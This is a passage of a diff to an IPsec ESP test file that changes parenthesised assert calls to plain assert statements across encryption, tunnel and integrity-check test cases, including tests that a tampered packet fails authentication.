sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) +assert isinstance(e, IP) * after encryption packet should be encapsulated with the given ip tunnel header -assert(e.src == '11.11.11.11' and e.dst == '22.22.22.22') -assert(e.chksum != p.chksum) +assert e.src == '11.11.11.11' and e.dst == '22.22.22.22' +assert e.chksum != p.chksum * the encrypted packet should have an ESP layer -assert(e.proto == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) +assert e.proto == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi * after encryption the original packet payload should NOT be readable -assert(b'testdata' not in e[ESP].data) +assert b'testdata' not in e[ESP].data d = sa.decrypt(e) d * after decryption the original packet payload should be unaltered -assert(d[TCP] == p[TCP]) +assert d[TCP] == p[TCP] ####################################### = IPv4 / ESP - Tunnel - 3DES - NULL @@ -439,23 +439,23 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) +assert isinstance(e, IP) * after encryption packet should be encapsulated with the given ip tunnel header -assert(e.src == '11.11.11.11' and e.dst == '22.22.22.22') -assert(e.chksum != p.chksum) +assert e.src == '11.11.11.11' and e.dst == '22.22.22.22' +assert e.chksum != p.chksum * the encrypted packet should have an ESP layer -assert(e.proto == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) +assert e.proto == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi * after encryption the original packet payload should NOT be readable -assert(b'testdata' not in e[ESP].data) +assert b'testdata' not in e[ESP].data d = sa.decrypt(e) d * after decryption the original packet payload should be unaltered -assert(d[TCP] == p[TCP]) +assert d[TCP] == p[TCP] ####################################### = IPv4 / ESP - Tunnel - AES-CBC - NULL @@ -474,22 +474,22 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) +assert isinstance(e, IP) * after encryption packet should be encapsulated with the given ip tunnel header -assert(e.src == '11.11.11.11' and e.dst == '22.22.22.22') -assert(e.chksum != p.chksum) -assert(e.proto == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) +assert e.src == '11.11.11.11' and e.dst == '22.22.22.22' +assert e.chksum != p.chksum +assert e.proto == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi * after encryption the original packet payload should NOT be readable -assert(b'testdata' not in e[ESP].data) +assert b'testdata' not in e[ESP].data d = sa.decrypt(e) d * after decryption the original packet payload should be unaltered -assert(d[TCP] == p[TCP]) +assert d[TCP] == p[TCP] ####################################### = IPv4 / ESP - Tunnel - AES-CTR - NULL @@ -508,22 +508,22 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) +assert isinstance(e, IP) * after encryption packet should be encapsulated with the given ip tunnel header -assert(e.src == '11.11.11.11' and e.dst == '22.22.22.22') -assert(e.chksum != p.chksum) -assert(e.proto == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) +assert e.src == '11.11.11.11' and e.dst == '22.22.22.22' +assert e.chksum != p.chksum +assert e.proto == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi * after encryption the original packet payload should NOT be readable -assert(b'testdata' not in e[ESP].data) +assert b'testdata' not in e[ESP].data d = sa.decrypt(e) d * after decryption original packet should be preserved -assert(d[TCP] == p[TCP]) +assert d[TCP] == p[TCP] ####################################### = IPv4 / ESP - Tunnel - Blowfish - NULL @@ -542,22 +542,22 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) +assert isinstance(e, IP) * after encryption packet should be encapsulated with the given ip tunnel header -assert(e.src == '11.11.11.11' and e.dst == '22.22.22.22') -assert(e.chksum != p.chksum) -assert(e.proto == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) +assert e.src == '11.11.11.11' and e.dst == '22.22.22.22' +assert e.chksum != p.chksum +assert e.proto == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi * after encryption the original packet payload should NOT be readable -assert(b'testdata' not in e[ESP].data) +assert b'testdata' not in e[ESP].data d = sa.decrypt(e) d * after decryption original packet should be preserved -assert(d[TCP] == p[TCP]) +assert d[TCP] == p[TCP] ####################################### = IPv4 / ESP - Tunnel - CAST - NULL @@ -576,22 +576,22 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) +assert isinstance(e, IP) * after encryption packet should be encapsulated with the given ip tunnel header -assert(e.src == '11.11.11.11' and e.dst == '22.22.22.22') -assert(e.chksum != p.chksum) -assert(e.proto == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) +assert e.src == '11.11.11.11' and e.dst == '22.22.22.22' +assert e.chksum != p.chksum +assert e.proto == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi * after encryption the original packet payload should NOT be readable -assert(b'testdata' not in e[ESP].data) +assert b'testdata' not in e[ESP].data d = sa.decrypt(e) d * after decryption original packet should be preserved -assert(d[TCP] == p[TCP]) +assert d[TCP] == p[TCP] ############################################################################### + IPv4 / ESP - Transport - Authentication Algorithms @@ -612,20 +612,20 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) -assert(e.src == '1.1.1.1' and e.dst == '2.2.2.2') -assert(e.chksum != p.chksum) -assert(e.proto == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) -assert(b'testdata' in e[ESP].data) +assert isinstance(e, IP) +assert e.src == '1.1.1.1' and e.dst == '2.2.2.2' +assert e.chksum != p.chksum +assert e.proto == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi +assert b'testdata' in e[ESP].data * integrity verification should pass d = sa.decrypt(e) * after decryption the original packet payload should be unaltered -assert(d[TCP] == p[TCP]) +assert d[TCP] == p[TCP] ####################################### = IPv4 / ESP - Transport - NULL - HMAC-SHA1-96 - altered packet @@ -643,14 +643,14 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) -assert(e.src == '1.1.1.1' and e.dst == '2.2.2.2') -assert(e.chksum != p.chksum) -assert(e.proto == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) -assert(b'testdata' in e[ESP].data) +assert isinstance(e, IP) +assert e.src == '1.1.1.1' and e.dst == '2.2.2.2' +assert e.chksum != p.chksum +assert e.proto == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi +assert b'testdata' in e[ESP].data * simulate the alteration of the packet before decryption e[ESP].data = e[ESP].data.replace(b'\x01', b'\x21') @@ -658,7 +658,7 @@ e[ESP].data = e[ESP].data.replace(b'\x01', b'\x21') * integrity verification should fail try: d = sa.decrypt(e) - assert(False) + assert False except IPSecIntegrityError as err: err @@ -678,21 +678,21 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) -assert(e.src == '1.1.1.1' and e.dst == '2.2.2.2') -assert(e.chksum != p.chksum) -assert(e.proto == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) +assert isinstance(e, IP) +assert e.src == '1.1.1.1' and e.dst == '2.2.2.2' +assert e.chksum != p.chksum +assert e.proto == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi * after encryption the original packet payload should be readable -assert(b'testdata' in e[ESP].data) +assert b'testdata' in e[ESP].data * integrity verification should pass d = sa.decrypt(e) * after decryption the original packet should be preserved -assert(d == p) +assert d == p ####################################### = IPv4 / ESP - Transport - NULL - SHA2-256-128 - altered packet @@ -710,15 +710,15 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) -assert(e.src == '1.1.1.1' and e.dst == '2.2.2.2') -assert(e.chksum != p.chksum) -assert(e.proto == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) +assert isinstance(e, IP) +assert e.src == '1.1.1.1' and e.dst == '2.2.2.2' +assert e.chksum != p.chksum +assert e.proto == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi * after encryption the original packet payload should be readable -assert(b'testdata' in e[ESP].data) +assert b'testdata' in e[ESP].data * simulate the alteration of the packet before decryption e[ESP].data = e[ESP].data.replace(b'\x01', b'\x21') @@ -726,7 +726,7 @@ e[ESP].data = e[ESP].data.replace(b'\x01', b'\x21') * integrity verification should fail try: d = sa.decrypt(e) - assert(False) + assert False except IPSecIntegrityError as err: err @@ -746,21 +746,21 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) -assert(e.src == '1.1.1.1' and e.dst == '2.2.2.2') -assert(e.chksum != p.chksum) -assert(e.proto == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) +assert isinstance(e, IP) +assert e.src == '1.1.1.1' and e.dst == '2.2.2.2' +assert e.chksum != p.chksum +assert e.proto == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi * after encryption the original packet payload should be readable -assert(b'testdata' in e[ESP].data) +assert b'testdata' in e[ESP].data * integrity verification should pass d = sa.decrypt(e) * after decryption the original packet should be preserved -assert(d == p) +assert d == p ####################################### = IPv4 / ESP - Transport - NULL - SHA2-384-192 - altered packet @@ -778,15 +778,15 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) -assert(e.src == '1.1.1.1' and e.dst == '2.2.2.2') -assert(e.chksum != p.chksum) -assert(e.proto == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) +assert isinstance(e, IP) +assert e.src == '1.1.1.1' and e.dst == '2.2.2.2' +assert e.chksum != p.chksum +assert e.proto == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi * after encryption the original packet payload should be readable -assert(b'testdata' in e[ESP].data) +assert b'testdata' in e[ESP].data * simulate the alteration of the packet before decryption e[ESP].data = e[ESP].data.replace(b'\x01', b'\x21') @@ -794,7 +794,7 @@ e[ESP].data = e[ESP].data.replace(b'\x01', b'\x21') * integrity verification should fail try: d = sa.decrypt(e) - assert(False) + assert False except IPSecIntegrityError as err: err @@ -814,21 +814,21 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) -assert(e.src == '1.1.1.1' and e.dst == '2.2.2.2') -assert(e.chksum != p.chksum) -assert(e.proto == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) +assert isinstance(e, IP) +assert e.src == '1.1.1.1' and e.dst == '2.2.2.2' +assert e.chksum != p.chksum +assert e.proto == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi * after encryption the original packet payload should be readable -assert(b'testdata' in e[ESP].data) +assert b'testdata' in e[ESP].data * integrity verification should pass d = sa.decrypt(e) * after decryption the original packet should be preserved -assert(d == p) +assert d == p ####################################### = IPv4 / ESP - Transport - NULL - SHA2-512-256 - altered packet @@ -846,15 +846,15 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) -assert(e.src == '1.1.1.1' and e.dst == '2.2.2.2') -assert(e.chksum != p.chksum) -assert(e.proto == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) +assert isinstance(e, IP) +assert e.src == '1.1.1.1' and e.dst == '2.2.2.2' +assert e.chksum != p.chksum +assert e.proto == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi * after encryption the original packet payload should be readable -assert(b'testdata' in e[ESP].data) +assert b'testdata' in e[ESP].data * simulate the alteration of the packet before decryption e[ESP].data = e[ESP].data.replace(b'\x01', b'\x21') @@ -862,7 +862,7 @@ e[ESP].data = e[ESP].data.replace(b'\x01', b'\x21') * integrity verification should fail try: d = sa.decrypt(e) - assert(False) + assert False except IPSecIntegrityError as err: err @@ -882,21 +882,21 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) -assert(e.src == '1.1.1.1' and e.dst == '2.2.2.2') -assert(e.chksum != p.chksum) -assert(e.proto == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) +assert isinstance(e, IP) +assert e.src == '1.1.1.1' and e.dst == '2.2.2.2' +assert e.chksum != p.chksum +assert e.proto == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi * after encryption the original packet payload should be readable -assert(b'testdata' in e[ESP].data) +assert b'testdata' in e[ESP].data * integrity verification should pass d = sa.decrypt(e) * after decryption the original packet should be preserved -assert(d == p) +assert d == p ####################################### = IPv4 / ESP - Transport - NULL - HMAC-MD5-96 - altered packet @@ -914,15 +914,15 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) -assert(e.src == '1.1.1.1' and e.dst == '2.2.2.2') -assert(e.chksum != p.chksum) -assert(e.proto == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) +assert isinstance(e, IP) +assert e.src == '1.1.1.1' and e.dst == '2.2.2.2' +assert e.chksum != p.chksum +assert e.proto == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi * after encryption the original packet payload should be readable -assert(b'testdata' in e[ESP].data) +assert b'testdata' in e[ESP].data * simulate the alteration of the packet before decryption e[ESP].data = e[ESP].data.replace(b'\x01', b'\x21') @@ -930,7 +930,7 @@ e[ESP].data = e[ESP].data.replace(b'\x01', b'\x21') * integrity verification should fail try: d = sa.decrypt(e) - assert(False) + assert False except IPSecIntegrityError as err: err @@ -950,21 +950,21 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) -assert(e.src == '1.1.1.1' and e.dst == '2.2.2.2') -assert(e.chksum != p.chksum) -assert(e.proto == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) +assert isinstance(e, IP) +assert e.src == '1.1.1.1' and e.dst == '2.2.2.2' +assert e.chksum != p.chksum +assert e.proto == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi * after encryption the original packet payload should be readable -assert(b'testdata' in e[ESP].data) +assert b'testdata' in e[ESP].data * integrity verification should pass d = sa.decrypt(e) * after decryption the original packet should be preserved -assert(d == p) +assert d == p ####################################### = IPv4 / ESP - Transport - NULL - AES-CMAC-96 - altered packet @@ -982,15 +982,15 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) -assert(e.src == '1.1.1.1' and e.dst == '2.2.2.2') -assert(e.chksum != p.chksum) -assert(e.proto == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) +assert isinstance(e, IP) +assert e.src == '1.1.1.1' and e.dst == '2.2.2.2' +assert e.chksum != p.chksum +assert e.proto == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi * after encryption the original packet payload should be readable -assert(b'testdata' in e[ESP].data) +assert b'testdata' in e[ESP].data * simulate the alteration of the packet before decryption e[ESP].data = e[ESP].data.replace(b'\x01', b'\x21') @@ -998,7 +998,7 @@ e[ESP].data = e[ESP].data.replace(b'\x01', b'\x21') * integrity verification should fail try: d = sa.decrypt(e) - assert(False) + assert False except IPSecIntegrityError as err: err @@ -1022,21 +1022,21 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) +assert isinstance(e, IP) * after encryption packet should be encapsulated with the given ip tunnel header -assert(e.src == '11.11.11.11' and e.dst == '22.22.22.22') -assert(e.chksum != p.chksum) -assert(e.proto == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) -assert(b'testdata' in e[ESP].data) +assert e.src == '11.11.11.11' and e.dst == '22.22.22.22' +assert e.chksum != p.chksum +assert e.proto == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi +assert b'testdata' in e[ESP].data * integrity verification should pass d = sa.decrypt(e) * after decryption the original packet payload should be unaltered -assert(d[TCP] == p[TCP]) +assert d[TCP] == p[TCP] ####################################### = IPv4 / ESP - Tunnel - NULL - HMAC-SHA1-96 - altered packet @@ -1055,15 +1055,15 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) +assert isinstance(e, IP) * after encryption packet should be encapsulated with the given ip tunnel header -assert(e.src == '11.11.11.11' and e.dst == '22.22.22.22') -assert(e.chksum != p.chksum) -assert(e.proto == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) -assert(b'testdata' in e[ESP].data) +assert e.src == '11.11.11.11' and e.dst == '22.22.22.22' +assert e.chksum != p.chksum +assert e.proto == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi +assert b'testdata' in e[ESP].data * simulate the alteration of the packet before decryption e[ESP].data = e[ESP].data.replace(b'\x01', b'\x21') @@ -1071,7 +1071,7 @@ e[ESP].data = e[ESP].data.replace(b'\x01', b'\x21') * integrity verification should fail try: d = sa.decrypt(e) - assert(False) + assert False except IPSecIntegrityError as err: err @@ -1092,22 +1092,22 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) +assert isinstance(e, IP) * after encryption packet should be encapsulated with the given ip tunnel header -assert(e.src == '11.11.11.11' and e.dst == '22.22.22.22') -assert(e.chksum != p.chksum) -assert(e.proto == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) +assert e.src == '11.11.11.11' and e.dst == '22.22.22.22' +assert e.chksum != p.chksum +assert e.proto == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi * after encryption the original packet payload should be readable -assert(b'testdata' in e[ESP].data) +assert b'testdata' in e[ESP].data * integrity verification should pass d = sa.decrypt(e) * after decryption the original packet should be preserved -assert(d == p) +assert d == p ####################################### = IPv4 / ESP - Tunnel - NULL - SHA2-256-128 - altered packet @@ -1126,16 +1126,16 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) +assert isinstance(e, IP) * after encryption packet should be encapsulated with the given ip tunnel header -assert(e.src == '11.11.11.11' and e.dst == '22.22.22.22') -assert(e.chksum != p.chksum) -assert(e.proto == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) +assert e.src == '11.11.11.11' and e.dst == '22.22.22.22' +assert e.chksum != p.chksum +assert e.proto == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi * after encryption the original packet payload should be readable -assert(b'testdata' in e[ESP].data) +assert b'testdata' in e[ESP].data * simulate the alteration of the packet before decryption e[ESP].data = e[ESP].data.replace(b'\x01', b'\x21') @@ -1143,7 +1143,7 @@ e[ESP].data = e[ESP].data.replace(b'\x01', b'\x21') * integrity verification should fail try: d = sa.decrypt(e) - assert(False) + assert False except IPSecIntegrityError as err: err @@ -1164,22 +1164,22 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) +assert isinstance(e, IP) * after encryption packet should be encapsulated with the given ip tunnel header -assert(e.src == '11.11.11.11' and e.dst == '22.22.22.22') -assert(e.chksum != p.chksum) -assert(e.proto == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) +assert e.src == '11.11.11.11' and e.dst == '22.22.22.22' +assert e.chksum != p.chksum +assert e.proto == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi * after encryption the original packet payload should be readable -assert(b'testdata' in e[ESP].data) +assert b'testdata' in e[ESP].data * integrity verification should pass d = sa.decrypt(e) * after decryption the original packet should be preserved -assert(d == p) +assert d == p ####################################### = IPv4 / ESP - Tunnel - NULL - SHA2-384-192 - altered packet @@ -1198,16 +1198,16 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) +assert isinstance(e, IP) * after encryption packet should be encapsulated with the given ip tunnel header -assert(e.src == '11.11.11.11' and e.dst == '22.22.22.22') -assert(e.chksum != p.chksum) -assert(e.proto == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) +assert e.src == '11.11.11.11' and e.dst == '22.22.22.22' +assert e.chksum != p.chksum +assert e.proto == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi * after encryption the original packet payload should be readable -assert(b'testdata' in e[ESP].data) +assert b'testdata' in e[ESP].data * simulate the alteration of the packet before decryption e[ESP].data = e[ESP].data.replace(b'\x01', b'\x21') @@ -1215,7 +1215,7 @@ e[ESP].data = e[ESP].data.replace(b'\x01', b'\x21') * integrity verification should fail try: d = sa.decrypt(e) - assert(False) + assert False except IPSecIntegrityError as err: err @@ -1236,22 +1236,22 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) +assert isinstance(e, IP) * after encryption packet should be encapsulated with the given ip tunnel header -assert(e.src == '11.11.11.11' and e.dst == '22.22.22.22') -assert(e.chksum != p.chksum) -assert(e.proto == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) +assert e.src == '11.11.11.11' and e.dst == '22.22.22.22' +assert e.chksum != p.chksum +assert e.proto == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi * after encryption the original packet payload should be readable -assert(b'testdata' in e[ESP].data) +assert b'testdata' in e[ESP].data * integrity verification should pass d = sa.decrypt(e) * after decryption the original packet should be preserved -assert(d == p) +assert d == p ####################################### = IPv4 / ESP - Tunnel - NULL - SHA2-512-256 - altered packet @@ -1270,16 +1270,16 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) +assert isinstance(e, IP) * after encryption packet should be encapsulated with the given ip tunnel header -assert(e.src == '11.11.11.11' and e.dst == '22.22.22.22') -assert(e.chksum != p.chksum) -assert(e.proto == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) +assert e.src == '11.11.11.11' and e.dst == '22.22.22.22' +assert e.chksum != p.chksum +assert e.proto == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi * after encryption the original packet payload should be readable -assert(b'testdata' in e[ESP].data) +assert b'testdata' in e[ESP].data * simulate the alteration of the packet before decryption e[ESP].data = e[ESP].data.replace(b'\x01', b'\x21') @@ -1287,7 +1287,7 @@ e[ESP].data = e[ESP].data.replace(b'\x01', b'\x21') * integrity verification should fail try: d = sa.decrypt(e) - assert(False) + assert False except IPSecIntegrityError as err: err @@ -1308,22 +1308,22 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) +assert isinstance(e, IP) * after encryption packet should be encapsulated with the given ip tunnel header -assert(e.src == '11.11.11.11' and e.dst == '22.22.22.22') -assert(e.chksum != p.chksum) -assert(e.proto == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) +assert e.src == '11.11.11.11' and e.dst == '22.22.22.22' +assert e.chksum != p.chksum +assert e.proto == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi * after encryption the original packet payload should be readable -assert(b'testdata' in e[ESP].data) +assert b'testdata' in e[ESP].data * integrity verification should pass d = sa.decrypt(e) * after decryption the original packet should be preserved -assert(d == p) +assert d == p ####################################### = IPv4 / ESP - Tunnel - NULL - HMAC-MD5-96 - altered packet @@ -1342,16 +1342,16 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) +assert isinstance(e, IP) * after encryption packet should be encapsulated with the given ip tunnel header -assert(e.src == '11.11.11.11' and e.dst == '22.22.22.22') -assert(e.chksum != p.chksum) -assert(e.proto == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) +assert e.src == '11.11.11.11' and e.dst == '22.22.22.22' +assert e.chksum != p.chksum +assert e.proto == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi * after encryption the original packet payload should be readable -assert(b'testdata' in e[ESP].data) +assert b'testdata' in e[ESP].data * simulate the alteration of the packet before decryption e[ESP].data = e[ESP].data.replace(b'\x01', b'\x21') @@ -1359,7 +1359,7 @@ e[ESP].data = e[ESP].data.replace(b'\x01', b'\x21') * integrity verification should fail try: d = sa.decrypt(e) - assert(False) + assert False except IPSecIntegrityError as err: err @@ -1380,22 +1380,22 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) +assert isinstance(e, IP) * after encryption packet should be encapsulated with the given ip tunnel header -assert(e.src == '11.11.11.11' and e.dst == '22.22.22.22') -assert(e.chksum != p.chksum) -assert(e.proto == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) +assert e.src == '11.11.11.11' and e.dst == '22.22.22.22' +assert e.chksum != p.chksum +assert e.proto == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi * after encryption the original packet payload should be readable -assert(b'testdata' in e[ESP].data) +assert b'testdata' in e[ESP].data * integrity verification should pass d = sa.decrypt(e) * after decryption the original packet should be preserved -assert(d == p) +assert d == p ####################################### = IPv4 / ESP - Tunnel - NULL - AES-CMAC-96 - altered packet @@ -1414,16 +1414,16 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) +assert isinstance(e, IP) * after encryption packet should be encapsulated with the given ip tunnel header -assert(e.src == '11.11.11.11' and e.dst == '22.22.22.22') -assert(e.chksum != p.chksum) -assert(e.proto == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == sa.spi) +assert e.src == '11.11.11.11' and e.dst == '22.22.22.22' +assert e.chksum != p.chksum +assert e.proto == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi * after encryption the original packet payload should be readable -assert(b'testdata' in e[ESP].data) +assert b'testdata' in e[ESP].data * simulate the alteration of the packet before decryption e[ESP].data = e[ESP].data.replace(b'\x01', b'\x21') @@ -1431,7 +1431,7 @@ e[ESP].data = e[ESP].data.replace(b'\x01', b'\x21') * integrity verification should fail try: d = sa.decrypt(e) - assert(False) + assert False except IPSecIntegrityError as err: err @@ -1454,21 +1454,21 @@ sa = SecurityAssociation(ESP, spi=0x222, e = sa.encrypt(p) e -assert(isinstance(e, IP)) -assert(e.src == '1.1.1.1' and e.dst == '2.2.2.2') -assert(e.chksum != p.chksum) -assert(e.proto == socket.IPPROTO_ESP) -assert(e.haslayer(ESP)) -assert(not e.haslayer(TCP)) -assert(e[ESP].spi == 